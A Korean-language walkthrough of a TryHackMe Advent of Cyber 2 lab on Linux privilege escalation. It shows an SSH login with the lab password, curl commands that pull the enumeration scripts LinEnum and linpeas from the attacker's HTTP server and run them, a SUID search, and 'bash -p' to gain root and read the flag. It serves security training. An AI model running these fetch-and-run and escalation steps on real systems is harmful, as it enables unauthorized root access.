[TryHackMe] Advent of Cyber 2, Day 11 - Walkthrough -
"Advent of Cyber 2"는 "free room"(무료)에서 제공됩니다. 구독 없이 가상 머신을 "배포(Deploy)"할 수 있습니다.
「Advent of Cyber 2」의 Walkthrough 인덱스를 「 [TryHackMe] Advent of Cyber 2에 참여해 보았습니다. 」에서 공개했습니다.
[Day 11] Networking: The Rogue Gnome
스토리
이것이다! --엘프 McEager가 기다리고 있던 순간입니다. 그는 "Day 8 - What's Under the Christmas Tree?"에서 원했던 Nmap
과정의 최종 시험입니다. 지금까지의 고생이 보상된 것 같다.... "성공!"엘프 McEager는 외쳤다. "익스플로잇이 잘됐다! Yippeee!"
엘프 McEager는 대상에서 자신의 컴퓨터에 대한 리버스 쉘을 구축하는 데 성공했습니다. 그는 거의 몰랐습니다, 진짜 시험은 앞으로입니다 .... 시험의 마지막 단계에서는 엘프 McEager의 권한을 승격시켜야합니다. 그는 Nmap
의 치트 시트 공부에 시간을 보냈기 때문에 지금은 머리가 새하얗게 .... 엘프 McEager를 도와주세요.
선인이 되기 위해서는 우선 악인이 되어야 할 수도 있다. (To be the good guy, sometimes you gotta be the bad guy first...)
Day 11 - #1.
What type of privilege escalation involves using a user account to execute commands as an administrator?
Day 11 - #2.
What is the name of the file that contains a list of users who are a part of the
sudo
group?kali@kali:~$ ls -l /etc/sudoers
-r--r----- 1 root root 669 Jul 12 11:52 /etc/sudoers
Day 11 - #3.
Use SSH to log in to the vulnerable machine like so: ssh cmnatic@MACHINE_IP
Input the following password when prompted: aoc2020
kali@kali:~$ ssh [email protected]
The authenticity of host '10.10.178.95 (10.10.178.95)' can't be established.
ECDSA key fingerprint is SHA256:Epte0uGyoBmg5Gb9zRw9f26JYUHv72UFd1VVNHcItUQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.178.95' (ECDSA) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-126-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat Dec 12 01:25:04 UTC 2020
System load: 0.0 Processes: 92
Usage of /: 27.8% of 14.70GB Users logged in: 0
Memory usage: 16% IP address for eth0: 10.10.178.95
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
68 packages can be updated.
0 updates are security updates.
Last login: Wed Dec 9 15:49:32 2020
-bash-4.4$
Day 11 - #4.
Enumerate the machine for executables that have had the SUID permission set. Look at the output and use a mixture of GTFObins and your researching skills to learn how to exploit this binary.
You may find uploading some of the enumeration scripts that were used during today's task to be useful.
kali@kali:~/OffsecVM$ python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
10.10.178.95 - - [11/Dec/2020 20:37:30] "GET /LinEmu.sh HTTP/1.1" 200 -
#EndOfScript-bash-4.4$ curl http://10.11.19.198:8080/LinEmu.sh -o LinEmu.sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 46630 100 46630 0 0 42390 0 0:00:01 0:00:01 --:--:-- 42390
-bash-4.4$
-bash-4.4$ chmod +x LinEmu.sh
-bash-4.4$ ./LinEmu.sh
-bash-4.4$ curl http://10.11.19.198:8080/linpeas.sh -o linpeas.sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 228k 100 228k 0 0 100k 0 0:00:02 0:00:02 --:--:-- 100k
-bash-4.4$ chmod +x linpeas.sh
-bash-4.4$ ./linpeas.sh
-bash-4.4$ find / -perm -u=s -type f 2>/dev/null
/bin/umount
/bin/mount
/bin/su
/bin/fusermount
/bin/bash
/bin/ping
/snap/core/10444/bin/mount
/snap/core/10444/bin/ping
/snap/core/10444/bin/ping6
/snap/core/10444/bin/su
/snap/core/10444/bin/umount
/snap/core/10444/usr/bin/chfn
/snap/core/10444/usr/bin/chsh
/snap/core/10444/usr/bin/gpasswd
/snap/core/10444/usr/bin/newgrp
/snap/core/10444/usr/bin/passwd
/snap/core/10444/usr/bin/sudo
/snap/core/10444/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/10444/usr/lib/openssh/ssh-keysign
/snap/core/10444/usr/lib/snapd/snap-confine
/snap/core/10444/usr/sbin/pppd
/snap/core/7270/bin/mount
/snap/core/7270/bin/ping
/snap/core/7270/bin/ping6
/snap/core/7270/bin/su
/snap/core/7270/bin/umount
/snap/core/7270/usr/bin/chfn
/snap/core/7270/usr/bin/chsh
/snap/core/7270/usr/bin/gpasswd
/snap/core/7270/usr/bin/newgrp
/snap/core/7270/usr/bin/passwd
/snap/core/7270/usr/bin/sudo
/snap/core/7270/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/7270/usr/lib/openssh/ssh-keysign
/snap/core/7270/usr/lib/snapd/snap-confine
/snap/core/7270/usr/sbin/pppd
/usr/bin/newgidmap
/usr/bin/at
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/newuidmap
/usr/bin/traceroute6.iputils
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/snapd/snap-confine
-bash-4.4$
Day 11 - #5.
Use this executable to launch a system shell as root.
What are the contents of the file located at/root/flag.txt?
-bash-4.4$ whoami
cmnatic
-bash-4.4$ bash -p
bash-4.4# whoami
root
bash-4.4# cat /root/flag.txt
thm{2fb1{BLOCKED}6592}
유용한 TryHackMe 객실
Walkthrough
Reference
이 문제에 관하여([TryHackMe] Advent of Cyber 2, Day 11 - Walkthrough -), 우리는 이곳에서 더 많은 자료를 발견하고 링크를 클릭하여 보았다 https://qiita.com/v_avenger/items/0df365675d02a35a7603텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
우수한 개발자 콘텐츠 발견에 전념 (Collection and Share based on the CC Protocol.)